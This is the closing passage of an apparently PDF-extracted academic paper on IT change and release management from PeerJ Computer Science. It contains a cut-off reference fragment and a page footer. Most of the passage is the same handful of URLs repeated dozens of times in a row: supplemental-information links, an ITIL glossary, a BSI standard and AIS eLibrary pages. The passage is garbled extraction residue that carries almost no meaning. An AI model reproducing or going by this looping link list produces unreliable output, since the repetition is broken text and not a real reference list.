achten). In: 5th Annual Convention on Nageldinger (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.29 30/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information http://dx.doi.org/10.7717/peerj-cs.29#supplemental-information https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.axelos.com/Corporate/media/Files/Glossaries/ITIL_2011_Glossary_GB-v1-0.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf https://www.bsi.bund.de/cae/servlet/contentblob/471456/publicationFile/30746/standard_1004.pdf http://dx.doi.org/10.1109/ICSSSM.2014.6874122 http://dx.doi.org/10.1109/ICSSSM.2012.6252208 http://dx.doi.org/10.1109/ICSESS.2011.5982242 http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/amcis2015/SocTech/GeneralPresentations/16/ http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article=3772&context=cais http://dx.doi.org/10.7717/peerj-cs.29 IT Change and Release Management 